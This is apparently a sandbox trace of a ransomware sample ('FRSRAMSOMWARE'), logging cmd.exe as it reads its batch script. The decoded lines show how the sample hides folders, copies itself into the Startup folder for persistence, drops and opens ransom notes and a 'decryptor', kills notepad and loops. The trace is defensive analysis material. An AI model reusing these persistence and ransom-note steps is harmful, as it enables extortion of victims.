lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.119] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0141.119] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0141.120] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.120] GetFileType (hFile=0x2e8) returned 0x1 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0141.120] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0141.120] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0141.120] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.120] GetFileType (hFile=0x2e8) returned 0x1 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0141.120] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0141.120] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0141.120] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.120] GetFileType (hFile=0x2e8) returned 0x1 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0141.120] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0141.120] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0141.120] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.120] GetFileType (hFile=0x2e8) returned 0x1 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0141.120] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.120] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0141.121] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0141.121] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.121] GetFileType (hFile=0x2e8) returned 0x1 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0141.121] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0141.121] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0141.121] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.121] GetFileType (hFile=0x2e8) returned 0x1 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0141.121] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0141.121] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0141.121] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.121] GetFileType (hFile=0x2e8) returned 0x1 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0141.121] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0141.121] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0141.121] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.121] GetFileType (hFile=0x2e8) returned 0x1 [0141.121] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0141.121] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0141.122] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0141.122] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.122] GetFileType (hFile=0x2e8) returned 0x1 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0141.122] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0141.122] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0141.122] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.122] GetFileType (hFile=0x2e8) returned 0x1 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0141.122] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0141.122] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0141.122] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.122] GetFileType (hFile=0x2e8) returned 0x1 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0141.122] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0141.122] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0141.122] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0141.122] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.122] GetFileType (hFile=0x2e8) returned 0x1 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0141.123] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0141.123] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0141.123] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.123] GetFileType (hFile=0x2e8) returned 0x1 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0141.123] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0141.123] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0141.123] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.123] GetFileType (hFile=0x2e8) returned 0x1 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0141.123] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0141.123] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0141.123] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.123] GetFileType (hFile=0x2e8) returned 0x1 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0141.123] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0141.123] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0141.123] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0141.124] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.124] GetFileType (hFile=0x2e8) returned 0x1 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0141.124] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0141.124] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0141.124] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.124] GetFileType (hFile=0x2e8) returned 0x1 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0141.124] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0141.124] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0141.124] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.124] GetFileType (hFile=0x2e8) returned 0x1 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0141.124] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0141.124] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0141.124] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.124] GetFileType (hFile=0x2e8) returned 0x1 [0141.124] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0141.124] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0141.125] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0141.125] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.125] GetFileType (hFile=0x2e8) returned 0x1 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0141.125] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0141.125] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0141.125] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.125] GetFileType (hFile=0x2e8) returned 0x1 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0141.125] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0141.125] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0141.125] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.125] GetFileType (hFile=0x2e8) returned 0x1 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0141.125] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0141.125] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0141.125] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0141.125] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.125] GetFileType (hFile=0x2e8) returned 0x1 [0141.125] SetFilePointer 